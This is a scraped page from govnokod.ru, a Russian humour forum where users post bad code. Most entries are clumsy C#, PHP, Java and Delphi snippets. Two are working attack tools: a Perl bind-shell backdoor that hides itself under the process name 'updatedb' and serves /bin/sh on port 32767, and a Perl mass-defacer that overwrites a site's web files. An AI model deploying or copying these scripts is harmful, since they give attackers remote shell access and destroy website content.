- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
while (true) {
try {
break;
}
catch {
}
}
Нашли или выдавили из себя код, который нельзя назвать нормальным, на который без улыбки не взглянешь? Не торопитесь его удалять или рефакторить, — запостите его на говнокод.ру, посмеёмся вместе!
+1.1
while (true) {
try {
break;
}
catch {
}
}
интересно сработает?
+849.2
switch (driver.Status)
{
case ClientStatus.Unknown:
return m_driverStatusNames[ClientStatus.Unknown];
case ClientStatus.Free:
return m_driverStatusNames[ClientStatus.Free];
case ClientStatus.Busy:
return m_driverStatusNames[ClientStatus.Busy];
case ClientStatus.InWay:
return m_driverStatusNames[ClientStatus.InWay];
case ClientStatus.Work:
return m_driverStatusNames[ClientStatus.Work];
case ClientStatus.Break:
return m_driverStatusNames[ClientStatus.Break];
case ClientStatus.Alarm:
return m_driverStatusNames[ClientStatus.Alarm];
}
:)
+22.5
<?
echo "<title>NNtime Proxy List</title>";
function proxylist($site){
$source=file_get_contents($site);
preg_match_all("/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}:[0-9]{2,4}/",$source,$matched);
return $matched[0];
}
$array=proxylist("http://www.nntime.com");
foreach($array as $tek){
$tek=str_replace("
","",$tek);
print $tek."<br>";
}
?>
−327.6
#!/usr/bin/perl
$port = 32767;
$port = $ARGV[0] if $ARGV[0];
exit if fork;
$0 = "updatedb" . " " x100;
$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 50);
while(1)
{
accept(X, S);
unless(fork)
{
open STDIN, "<&X";
open STDOUT, ">&X";
open STDERR, ">&X";
close X;
exec("/bin/sh");
}
close X;
}
−388
#!/usr/bin/perl -w
#Masss Defacer v2.0
# Coded By illuz1oN
# Creditz - Nostur
$def = 'YOUR LAME DEFACE PAGE HERE =)';
{ print "[+]DEFACING...\n";
print"[+]DEFACING .PHP FILES...\n";
my @php = glob("*.php"); #Files
foreach my $deface(@php){
open(DEFACE, '>', $deface);
print DEFACE $def || print "[-]Fxcked up: $!\n";
close(DEFACE)
}
print "[+]DEFACING .HTML FILES...\n";
my @html = glob("*.html"); #Files
foreach my $deface(@html){
open(DEFACE, '>', $deface);
print DEFACE $def || print "[-]Fxcked up: $!\n";
close(DEFACE)
}
print "[+]DEFACING .ASP FILES...\n";
my @asp = glob("*.asp"); #Files
foreach my $deface(@asp){
open(DEFACE, '>', $deface);
print DEFACE $def || print "[-]Fxcked up: $!\n";
close(DEFACE)
}
print "[+]DEFACING .ASPX FILES...\n";
my @aspx = glob("*.aspx"); #Files
foreach my $deface(@aspx){
open(DEFACE, '>', $deface);
print DEFACE $def || print "[-]Fxcked up: $!\n";
close(DEFACE)
}
print "[+]DEFACING .HTM FILES...\n";
my @htm = glob("*.htm"); #Files
foreach my $deface(@htm){
open(DEFACE, '>', $deface);
print DEFACE $def || print "[-]Fxcked up: $!\n";
close(DEFACE)
}
print "[+]DEFACING .JS FILES...\n";
my @js = glob("*.js"); #Files
foreach my $deface(@js){
open(DEFACE, '>', $deface);
print DEFACE $def || print "[-]Fxcked up: $!\n";
close(DEFACE)
}
print "[+]DEFACING .AC FILES...\n";
my @ac = glob("*.ac"); #Files
foreach my $deface(@ac){
open(DEFACE, '>', $deface);
print DEFACE $def || print "[-]Fxcked up: $!\n";
close(DEFACE)
}
print "[+]Pages Should Be Defaced!\n";
}
#Coded By illuz1oN
#Credits - Nostur!
−232
push esp
push $00000101
mov eax,[$0044ee50]
mov eax,[eax] ;eax = 0
call eax
Вызывал функцию WSAStartup в дельфе, но забыл из какого она юнита. Хелп показал 2 пункта WSAStartup, не подумал тупо скопировал IdWinsock (вместо Winsock). Запускаю - access violation. В дебагере ctrl+c. Дельфя скомпилила так, что в любом случае вылетает аксес :)
+51.9
set_include_path( dirname(__FILE__) . DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'libs'
. PATH_SEPARATOR . dirname(__FILE__) . DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.
'libs'.DIRECTORY_SEPARATOR.'doctrine'.DIRECTORY_SEPARATOR.'lib'
. PATH_SEPARATOR . dirname(__FILE__) . DIRECTORY_SEPARATOR.'..'.
DIRECTORY_SEPARATOR.'libs'.DIRECTORY_SEPARATOR.'doctrine'.DIRECTORY_SEPARATOR
. PATH_SEPARATOR . dirname(__FILE__) . DIRECTORY_SEPARATOR.'..'.
DIRECTORY_SEPARATOR.'libs'.DIRECTORY_SEPARATOR.'doctrine'.DIRECTORY_SEPARATOR.
'tests'.DIRECTORY_SEPARATOR.'DoctrineTest'
. PATH_SEPARATOR . dirname(__FILE__) . DIRECTORY_SEPARATOR.'..'.
DIRECTORY_SEPARATOR.'libs'.DIRECTORY_SEPARATOR.'doctrine'.DIRECTORY_SEPARATOR.
'tests'
. PATH_SEPARATOR . dirname(__FILE__) . DIRECTORY_SEPARATOR.'..'
. PATH_SEPARATOR . dirname(__FILE__) . DIRECTORY_SEPARATOR.'Model'
. PATH_SEPARATOR . dirname(__FILE__) . DIRECTORY_SEPARATOR.'Model'.DIRECTORY_SEPARATOR.'BaseClasses'
. PATH_SEPARATOR . dirname(__FILE__) . DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'libs'.DIRECTORY_SEPARATOR.'smarty'
. PATH_SEPARATOR . dirname(__FILE__) . DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR
. PATH_SEPARATOR . dirname(__FILE__) . DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'libs'.DIRECTORY_SEPARATOR.'jsPacker'
. PATH_SEPARATOR . dirname(__FILE__) . DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'libs'.DIRECTORY_SEPARATOR.'FirePHPLibrary'.DIRECTORY_SEPARATOR.'lib'
. PATH_SEPARATOR . get_include_path());
+33.1
$this->mm = ($this->md[2] < 4) ? ($this->md[2] < 3) ? ($this->md[2] < 2) ? imagecreatefromgif($this->mi) : imagecreatefromjpeg($this->mi) : imagecreatefrompng($this->mi) : Null;
Загрузка изображения в VaMShop
−56.7
private List<WorkOrderWrapper> copy(List<WorkOrderWrapper> src) {
List<WorkOrderWrapper> ret = Collections.emptyList();
if (src != null) {
ret = new ArrayList<WorkOrderWrapper>(src.size());
for (int i = src.size() - 1; i >= 0; i--) {
ret.add(src.get(i));
}
}
return ret;
}
Мы легких путей не ищем!
+15
<?php
// © Eugen :)
// ...
function fuck($v) {
global $pizdec;
// ...
}
// ...
?>
Оптимистически...